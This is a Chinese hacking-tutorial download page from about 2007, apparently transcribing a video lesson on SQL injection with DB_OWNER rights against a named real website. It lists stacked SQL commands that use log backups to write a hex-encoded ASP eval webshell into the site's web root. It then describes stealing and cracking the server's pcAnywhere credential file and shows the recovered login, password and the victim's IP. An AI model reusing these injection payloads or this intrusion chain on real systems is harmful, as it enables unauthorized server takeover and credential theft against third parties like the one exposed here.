首 页文章中心黑客工具黑吧学院技术论坛安全培训免费频道最近更新瑞星在线杀毒黑吧百度繁體中文
  设为首页
加入收藏
发布作品
   
栏目导航
· 入侵检测 · 论坛分析
· 新手上路 · 脚本入侵
· 本站原创 · 会员作品
本类热门
· VB打造简单免杀下载者...
· 破解王者舞间道外挂
· 另类破解股市小助理
· 易语言免杀鸽子表面过...
· 黑防鸽子轻松免杀过no...
· GG24小时收录新站
· 免费申请QQ无限邮箱
· 上兴2008上线二种方法...
· 突破Asp防注入系统(2动...
· 双ADSL两线--多ADSL上...
· 网吧中诺德尔快鹿使用...
· 命令做全免杀(过所有杀...
DB_OWNER权限注入加pcAnywhere连接
运行环境 Win9X/Win2000/WinXP/Win2003/
整理时间 2007-1-30 2:37:33
软件星级
软件语言 简体中文
软件类型 综合教程
授权方式 免费教程
软件大小 27.83 MB
相关连接 hack58fb#126.com   官方主页   没有预览图片 [收 藏]
下载统计
解压密码 本站默认解压密码:www.hack58.com
S 软件简介


-----------------------------------------------------------------------------------

黑客动画吧 http://www.hack58.com

专业的黑客动画教程网站

免费学习黑客黑客技术

成为黑客不是梦。
打造国内最大的黑客动画网站

注意:所有教程全部对外免费开放

-----------------------------------------------------------------------------------
大家好,我是一丝不挂,今天给大家带来的教程是DB_OWNER权限下得到shell 并且远程登陆

今天要用到的工具是一.help.asp[大马一只]
                  二.PcAnywhere密码破解.exe
                  三.pcAnywhere汉化版 我没找到 呵呵
                  四.lake2的eval最小马发送端
                  五.DSQLTools.exe
                  六.NBSI2API.exe
好了 就这样吧  现在开始做教程

现在我已经得到了一只DB_OWNER权限的鸡吧 呵呵

现在我们打开啊D

http://www.jamemost.com.cn/English/product_list.asp?ProductCatID=15&ProductID=20 这是存在的注入点

看到了吧 DB_OWNER权限  现在我们要做的是查找站的跟目录 D:\Webhome\jamemost\web\ 这个是站的跟目录

现在我们要用到log 备份得到权限 .由于我用的是2.5的 不支持自动上传 现在我手动上传

大家看我操作  这里的a 是连接密码 相关的教程里面都会有解释D:\Webhome\jamemost\web\这是站的跟目录 刚刚已经讲过了 现在我给大家演示一下

要用到的命令是
';alter database JiaMao set RECOVERY FULL--
';create table cmd (a image)--
';backup log JiaMao to disk = 'e:\cmd' with init--
';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
';backup log JiaMao to disk = 'D:\Webhome\jamemost\web\lalala.asp'--

5步操作 现在我们打开../lalala.asp

已经成功,现在我们用lake2的eval最小马连接.

估计我掉线了 今天网吧真垃圾!~

不好意思了 好了 嘿嘿 现在继续..


Save to D:\Webhome\jamemost\web\lalala1.asp Success ! 上传成功了.现在我们连接一下

刚刚密码被我改成123456了 我们登陆 进来了 首先我们看一下能不能CMD

ws cript.shell √ 命令行执行组件  支持的

没有权限..所以我们只能看下serv-u 提权试试 3389也没有开放..我们只好找找别的漏洞了


C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 嘿嘿..现在开始下载它的2PCA.ourspinxi.CIF CIF格式的哦..看清楚下

下好后我们用PcAnywhere密码破解.exe 破解 直接拖到里面就好了


User information:
Login name: ourspinxi
Password: %*#%!)^@

现在我们用pcanywhere 连接试试  这里是它的IP 222.73.250.93 这里 好了 我们连接看下

然后输入帐号密码 被锁屏了 没法演示了 这里我给大家只是一种思路 要学会利用

好了 教程就做到这吧 还有一点 刚刚忘说了  我刚指的那三个地方应该填上当前库的名字 切记哦

我的Q 136010025

有不懂的可以问我..88了

S 下载地址

电信下载
网通下载

 

 
S 相关软件
· DB_OWNER OR SA提权的教程
· DB_OWNER提权
· DB_OWNER权限下拿服务器教程
· DB_owner权限下拿Shell
· 网站SA漏洞和DB_OWNER利用
· DB_OWNER不备份也拿WEBSHELL
· DB_OWNER权限下的入侵思路
· DB_OWNER权限注入网站拿服务器
 DB_OWNER权限注入加pcAnywhere连接最新动画 DB_OWNER权限注入加pcAnywhere连接最新版
DB_OWNER权限注入加pcAnywhere连接最新免杀 DB_OWNER权限注入加pcAnywhere连接升级版
 DB_OWNER权限注入加pcAnywhere连接破解版 DB_OWNER权限注入加pcAnywhere连接注册机
DB_OWNER权限注入加pcAnywhere连接免费版 DB_OWNER权限注入加pcAnywhere连接汉化补丁
S 下载说明
为了达到最快的下载速度,推荐使用[讯雷]下载本站软件。
请一定升级到最新版[WinRAR3.5]才能正常解压本站提供的软件!
如果您发现该软件不能下载,请点击报告错误谢谢!
站内提供的所有软件包含破解及注册码均是由网上搜集,若侵犯了你的版权利益,敬请来信通知我们!
 
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 网站导航 - 作品发布
互联网备案登记:粤ICP备05008775号
友情提示:浏览本站,请使用IE6.0浏览,并将分辩率设置为1024*768 为佳
Copyright © 2002-2005 Hack58.Com. All Rights Reserved .